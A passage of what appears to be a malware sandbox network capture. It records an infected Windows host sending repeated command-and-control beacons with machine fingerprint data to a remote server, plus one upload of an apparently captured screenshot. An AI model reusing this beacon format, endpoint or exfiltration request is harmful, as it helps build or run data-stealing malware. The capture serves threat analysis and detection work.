                                                                                                                                          Apr 28, 2021 22:59:38.560852051 CEST5462OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:38.562028885 CEST5465OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:38.654827118 CEST5477OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:38.654875994 CEST5483OUTData Raw: 27 6a 0a e6 64 6f 01 ef 55 de 10 4e 3a 55 ea 64 8a 0b 73 51 ca 5c 64 72 db b6 f3 9a fd 31 ff 00 83 51 ae c4 5f f0 53 ad 4d ca b1 1f f0 aa 35 8f 95 17 24 e2 e2 c8 e0 0e e7 8a fc ce af 69 fd 83 ff 00 6f 0f 8d bf f0 4e cf 8d 77 1f 1f 3e 00 d9 e8 53
                                                                                                                                          Data Ascii: 'jdoUN:UdsQ\dr1Q_SM5$ioNw>Sk390D"|P$a#:ppUaC3qOaM|)|_u+"mTyhXwr$)@%j]6+/oqo!G# 9o(?Ko
                                                                                                                                          Apr 28, 2021 22:59:38.655314922 CEST5488OUTData Raw: 79 ba 8e 9d f6 8b 07 1a 65 e4 af 14 72 cd 73 69 e4 cb 34 d1 ac d2 3b ca a1 c7 89 53 28 cd a3 89 93 8b bc 1b 8e 97 b2 69 41 46 4a da d9 39 59 a5 aa 4a 9c 55 9f 3c cf 55 e6 99 5d 6a 7a ab 4a da 3b 5d a7 dd da d7 7b dd de 2d b9 c9 de f1 82 5e 9b f1
                                                                                                                                          Data Ascii: yersi4;S(iAFJ9YJU<U]jzJ;]{-^?O.x^$Q|E<>.$APq*nBv'Bo<#mS6>tGeso,A\mim=[="o05[O[


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          171 | 192.168.2.4 | 49844 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.610358000 CEST | 5466 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          172 | 176.111.174.114 | 80 | 192.168.2.4 | 49844 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.710623980 CEST | 5521 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          173 | 192.168.2.4 | 49846 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.938213110 CEST | 5684 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          174 | 176.111.174.114 | 80 | 192.168.2.4 | 49843 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:38.946222067 CEST | 5695 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          175 | 176.111.174.114 | 80 | 192.168.2.4 | 49846 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:39.054698944 CEST | 5697 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          176 | 192.168.2.4 | 49848 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:39.269417048 CEST | 5701 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          177 | 176.111.174.114 | 80 | 192.168.2.4 | 49848 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:39.374224901 CEST | 5708 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          178 | 192.168.2.4 | 49850 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:39.591568947 CEST | 5767 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          179 | 176.111.174.114 | 80 | 192.168.2.4 | 49850 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:39.693455935 CEST | 5884 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          18 | 192.168.2.4 | 49757 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:12.109806061 CEST | 4530 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          180 | 192.168.2.4 | 49851 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:39.906858921 CEST | 5884 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          181 | 176.111.174.114 | 80 | 192.168.2.4 | 49851 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.005188942 CEST | 5885 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          182 | 192.168.2.4 | 49853 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.225919962 CEST | 5893 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          183 | 176.111.174.114 | 80 | 192.168.2.4 | 49853 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.322767019 CEST | 5893 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          184 | 192.168.2.4 | 49855 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.533087969 CEST | 6019 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          185 | 176.111.174.114 | 80 | 192.168.2.4 | 49855 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.630696058 CEST | 6086 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          186 | 192.168.2.4 | 49856 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.841882944 CEST | 6097 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          187 | 176.111.174.114 | 80 | 192.168.2.4 | 49856 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:40.939368010 CEST | 6098 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:40 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          188 | 192.168.2.4 | 49857 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:41.144257069 CEST | 6100 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          189 | 176.111.174.114 | 80 | 192.168.2.4 | 49857 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:41.247226000 CEST | 6107 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          19 | 176.111.174.114 | 80 | 192.168.2.4 | 49757 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:12.211220980 CEST | 4530 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:12 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          190 | 192.168.2.4 | 49859 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:41.461703062 CEST | 6149 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          191 | 176.111.174.114 | 80 | 192.168.2.4 | 49859 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:41.565853119 CEST | 6150 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:41 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          192 | 192.168.2.4 | 49860 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:41.617577076 CEST | 6163 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 
